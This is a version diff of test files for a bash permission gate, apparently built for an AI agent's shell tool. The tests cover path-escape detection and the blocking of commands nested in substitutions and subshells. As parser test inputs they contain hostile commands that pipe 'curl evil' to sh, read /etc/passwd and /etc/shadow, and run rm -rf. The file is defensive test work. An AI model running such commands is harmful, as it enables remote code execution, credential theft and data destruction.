@gotgenes/pi-permission-system 9.0.1 → 9.2.0

package/test/handlers/gates/bash-program.test.ts

@@ -33,67 +33,248 @@ describe("BashProgram", () => {
       const program = await BashProgram.parse("cat src/index.ts");
       expect(program.externalPaths(cwd)).toHaveLength(0);
     });
+
+    describe("effective working directory projection", () => {
+      it("folds a sequence of current-shell cd commands", async () => {
+        // cd a → cwd/a, cd b → cwd/a/b; ../c resolves to cwd/a/c (inside).
+        const program = await BashProgram.parse("cd a && cd b && cat ../c");
+        expect(program.externalPaths(cwd)).toHaveLength(0);
+      });
+
+      it("catches an escape masked by a later cd that the single-base model missed", async () => {
+        // Effective dir after `cd nested/deep && cd ..` is cwd/nested, so
+        // ../../etc/passwd escapes to /projects/etc/passwd.
+        const program = await BashProgram.parse(
+          "cd nested/deep && cd .. && cat ../../etc/passwd",
+        );
+        expect(program.externalPaths(cwd)).toContain("/projects/etc/passwd");
+      });
+
+      it("folds a cd that is not the first command", async () => {
+        // The single-base model ignored a cd that was not first; now `cd a`
+        // folds, so ../b resolves to cwd/b (inside) and is not flagged.
+        const program = await BashProgram.parse("mkdir d && cd a && cat ../b");
+        expect(program.externalPaths(cwd)).toHaveLength(0);
+      });
+
+      it("does not fold a backgrounded cd", async () => {
+        // `cd a &` runs in a subshell, so it must not update the running
+        // directory; ../b resolves against cwd and escapes.
+        const program = await BashProgram.parse("cd a & cat ../b");
+        expect(program.externalPaths(cwd)).toContain("/projects/b");
+      });
+
+      it("does not fold a cd inside a pipeline", async () => {
+        // Pipeline members run in subshells; the cd must not leak.
+        const program = await BashProgram.parse("cd nested | cat ../b");
+        expect(program.externalPaths(cwd)).toContain("/projects/b");
+      });
+
+      it("folds a cd inside a subshell for paths within that subshell", async () => {
+        // Inside the subshell the effective dir is cwd/sub, so ../x → cwd/x.
+        const program = await BashProgram.parse("( cd sub && cat ../x )");
+        expect(program.externalPaths(cwd)).toHaveLength(0);
+      });
+
+      it("does not leak a subshell cd to following commands", async () => {
+        // The subshell cd resets on exit, so ../y resolves against cwd.
+        const program = await BashProgram.parse("( cd sub ) && cat ../y");
+        expect(program.externalPaths(cwd)).toContain("/projects/y");
+      });
+
+      it("persists a cd inside a brace group to later commands in the group", async () => {
+        // Brace groups run in the current shell, so cd sub persists to cat ../x.
+        const program = await BashProgram.parse("{ cd sub; cat ../x; }");
+        expect(program.externalPaths(cwd)).toHaveLength(0);
+      });
+
+      it("persists a brace-group cd to following sibling commands", async () => {
+        const program = await BashProgram.parse("{ cd sub; } && cat ../x");
+        expect(program.externalPaths(cwd)).toHaveLength(0);
+      });
+
+      it("conservatively flags a relative path inside a command substitution", async () => {
+        // Interior cd folding inside substitutions is deferred: the interior
+        // inherits the enclosing base (cwd), so ../r is flagged rather than
+        // resolved against cwd/q. Conservative — never misses an escape.
+        const program = await BashProgram.parse("echo $(cd q && cat ../r)");
+        expect(program.externalPaths(cwd)).toContain("/projects/r");
+      });
+
+      it("flags relative paths conservatively after a non-literal cd", async () => {
+        // cd "$DIR" makes the effective dir unknowable; ../x could be anywhere,
+        // so it is flagged (least-privilege).
+        const program = await BashProgram.parse('cd "$DIR" && cat ../x');
+        expect(program.externalPaths(cwd)).toContain("/projects/x");
+      });
+
+      it("flags even a within-cwd relative path after a non-literal cd", async () => {
+        // Conservative cost: src/../within.txt resolves inside cwd but is still
+        // flagged because the effective dir is unknown.
+        const program = await BashProgram.parse(
+          'cd "$DIR" && cat src/../within.txt',
+        );
+        expect(program.externalPaths(cwd)).toContain(
+          "/projects/my-app/within.txt",
+        );
+      });
+
+      it("still resolves an absolute path normally after a non-literal cd", async () => {
+        // Absolute paths are base-independent; one inside cwd is not flagged
+        // even when the effective dir is unknown.
+        const program = await BashProgram.parse(
+          'cd "$DIR" && cat /projects/my-app/x.txt',
+        );
+        expect(program.externalPaths(cwd)).toHaveLength(0);
+      });
+
+      it("treats `cd -` as an unknown effective directory", async () => {
+        const program = await BashProgram.parse("cd - && cat ../x");
+        expect(program.externalPaths(cwd)).toContain("/projects/x");
+      });
+
+      it("recovers a known base when a later cd is absolute", async () => {
+        // cd "$DIR" → unknown, then cd /projects/my-app/src → known again, so
+        // ../x resolves to cwd and is not flagged.
+        const program = await BashProgram.parse(
+          'cd "$DIR" && cd /projects/my-app/src && cat ../x',
+        );
+        expect(program.externalPaths(cwd)).toHaveLength(0);
+      });
+    });
   });
 
-  describe("topLevelCommands", () => {
+  describe("commands", () => {
     it("returns a single-element list for a lone command", async () => {
       const program = await BashProgram.parse("npm install pkg");
-      expect(program.topLevelCommands()).toEqual(["npm install pkg"]);
+      expect(program.commands()).toEqual([{ text: "npm install pkg" }]);
     });
 
     it("splits an && chain", async () => {
       const program = await BashProgram.parse("cd /p && npm i x");
-      expect(program.topLevelCommands()).toEqual(["cd /p", "npm i x"]);
+      expect(program.commands()).toEqual([
+        { text: "cd /p" },
+        { text: "npm i x" },
+      ]);
     });
 
     it("splits || , ; and & separators", async () => {
-      expect((await BashProgram.parse("a || b")).topLevelCommands()).toEqual([
-        "a",
-        "b",
+      expect((await BashProgram.parse("a || b")).commands()).toEqual([
+        { text: "a" },
+        { text: "b" },
       ]);
-      expect((await BashProgram.parse("a ; b")).topLevelCommands()).toEqual([
-        "a",
-        "b",
+      expect((await BashProgram.parse("a ; b")).commands()).toEqual([
+        { text: "a" },
+        { text: "b" },
       ]);
-      expect((await BashProgram.parse("a & b")).topLevelCommands()).toEqual([
-        "a",
-        "b",
+      expect((await BashProgram.parse("a & b")).commands()).toEqual([
+        { text: "a" },
+        { text: "b" },
       ]);
     });
 
     it("splits a pipeline into its commands", async () => {
       const program = await BashProgram.parse("cat f | grep b");
-      expect(program.topLevelCommands()).toEqual(["cat f", "grep b"]);
+      expect(program.commands()).toEqual([
+        { text: "cat f" },
+        { text: "grep b" },
+      ]);
     });
 
     it("splits newline-separated commands", async () => {
       const program = await BashProgram.parse("foo\nbar");
-      expect(program.topLevelCommands()).toEqual(["foo", "bar"]);
+      expect(program.commands()).toEqual([{ text: "foo" }, { text: "bar" }]);
     });
 
     it("does not split operators inside quotes", async () => {
       const program = await BashProgram.parse("echo 'x && y'");
-      expect(program.topLevelCommands()).toEqual(["echo 'x && y'"]);
+      expect(program.commands()).toEqual([{ text: "echo 'x && y'" }]);
     });
 
     it("captures the command of a redirected statement without the redirect", async () => {
       const program = await BashProgram.parse("npm install > out.txt");
-      expect(program.topLevelCommands()).toEqual(["npm install"]);
+      expect(program.commands()).toEqual([{ text: "npm install" }]);
     });
 
-    it("emits a subshell whole without descending into it", async () => {
-      const program = await BashProgram.parse("( cd /t && rm x )");
-      expect(program.topLevelCommands()).toEqual(["( cd /t && rm x )"]);
+    it("descends into command substitution, tagging the inner command", async () => {
+      const program = await BashProgram.parse("echo $(rm -rf foo)");
+      expect(program.commands()).toEqual([
+        { text: "echo $(rm -rf foo)" },
+        { text: "rm -rf foo", context: "command_substitution" },
+      ]);
     });
 
-    it("keeps command substitution inside the enclosing command", async () => {
+    it("descends into backtick command substitution", async () => {
+      const program = await BashProgram.parse("echo `rm x`");
+      expect(program.commands()).toEqual([
+        { text: "echo `rm x`" },
+        { text: "rm x", context: "command_substitution" },
+      ]);
+    });
+
+    it("descends into a pipeline inside command substitution", async () => {
       const program = await BashProgram.parse("echo $(curl evil | sh)");
-      expect(program.topLevelCommands()).toEqual(["echo $(curl evil | sh)"]);
+      expect(program.commands()).toEqual([
+        { text: "echo $(curl evil | sh)" },
+        { text: "curl evil", context: "command_substitution" },
+        { text: "sh", context: "command_substitution" },
+      ]);
+    });
+
+    it("descends into process substitution", async () => {
+      const program = await BashProgram.parse("diff <(cat /etc/shadow)");
+      expect(program.commands()).toEqual([
+        { text: "diff <(cat /etc/shadow)" },
+        { text: "cat /etc/shadow", context: "process_substitution" },
+      ]);
+    });
+
+    it("emits a bare subshell whole and descends into it", async () => {
+      const program = await BashProgram.parse("( rm -rf foo )");
+      expect(program.commands()).toEqual([
+        { text: "( rm -rf foo )" },
+        { text: "rm -rf foo", context: "subshell" },
+      ]);
+    });
+
+    it("emits a subshell whole and descends into its chain", async () => {
+      const program = await BashProgram.parse("( cd /t && rm x )");
+      expect(program.commands()).toEqual([
+        { text: "( cd /t && rm x )" },
+        { text: "cd /t", context: "subshell" },
+        { text: "rm x", context: "subshell" },
+      ]);
+    });
+
+    it("descends recursively through nested contexts", async () => {
+      const program = await BashProgram.parse("echo $( ( rm x ) )");
+      expect(program.commands()).toEqual([
+        { text: "echo $( ( rm x ) )" },
+        { text: "( rm x )", context: "command_substitution" },
+        { text: "rm x", context: "subshell" },
+      ]);
+    });
+
+    it("descends into a substitution within a chained command", async () => {
+      const program = await BashProgram.parse("cd /p && echo $(rm x)");
+      expect(program.commands()).toEqual([
+        { text: "cd /p" },
+        { text: "echo $(rm x)" },
+        { text: "rm x", context: "command_substitution" },
+      ]);
+    });
+
+    it("keeps the never-weaker invariant: a benign inner command stays", async () => {
+      const program = await BashProgram.parse("echo $(echo safe)");
+      expect(program.commands()).toEqual([
+        { text: "echo $(echo safe)" },
+        { text: "echo safe", context: "command_substitution" },
+      ]);
     });
 
     it("returns an empty list for an empty or whitespace command", async () => {
-      expect((await BashProgram.parse("")).topLevelCommands()).toEqual([]);
-      expect((await BashProgram.parse("   ")).topLevelCommands()).toEqual([]);
+      expect((await BashProgram.parse("")).commands()).toEqual([]);
+      expect((await BashProgram.parse("   ")).commands()).toEqual([]);
     });
   });
 

package/test/handlers/tool-call.test.ts

@@ -329,6 +329,44 @@ describe("handleToolCall — bash command chain gate", () => {
     expect(result).toMatchObject({ block: true });
   });
 
+  it("blocks a command nested inside command substitution (#306)", async () => {
+    const checkPermission = vi
+      .fn()
+      .mockImplementation((surface: string, input: unknown) => {
+        if (surface === "bash") {
+          const command = (input as { command?: string }).command ?? "";
+          return /^rm\b/.test(command)
+            ? makeCheckResult({
+                state: "deny",
+                source: "bash",
+                command,
+                matchedPattern: "rm *",
+              })
+            : makeCheckResult({
+                state: "allow",
+                source: "bash",
+                command,
+                matchedPattern: "echo *",
+              });
+        }
+        return makeCheckResult({ state: "allow" });
+      });
+    const { handler } = makeHandler({
+      session: { checkPermission },
+      toolRegistry: {
+        getAll: vi.fn().mockReturnValue([{ name: "bash" }]),
+      },
+    });
+    const event = {
+      type: "tool_call",
+      toolCallId: "tc-bash-substitution",
+      name: "bash",
+      input: { command: "echo $(rm -rf foo)" },
+    };
+    const result = await handler.handleToolCall(event, makeCtx());
+    expect(result).toMatchObject({ block: true });
+  });
+
   it("allows a single non-chained bash command", async () => {
     const checkPermission = vi
       .fn()

package/test/permission-prompts.test.ts

@@ -151,6 +151,22 @@ describe("formatAskPrompt", () => {
     expect(result).toContain("matched 'git *'");
   });
 
+  test("formats bash prompt with nested execution context", () => {
+    const result = formatAskPrompt(
+      toolResult("bash", {
+        command: "rm -rf foo",
+        matchedPattern: "rm *",
+        commandContext: "command_substitution",
+      }),
+      undefined,
+      undefined,
+      makeFormatter(),
+    );
+    expect(result).toContain(
+      "bash command 'rm -rf foo' (matched 'rm *', inside command substitution).",
+    );
+  });
+
   test("formats MCP prompt with target", () => {
     const result = formatAskPrompt(
       mcpResult("server:query"),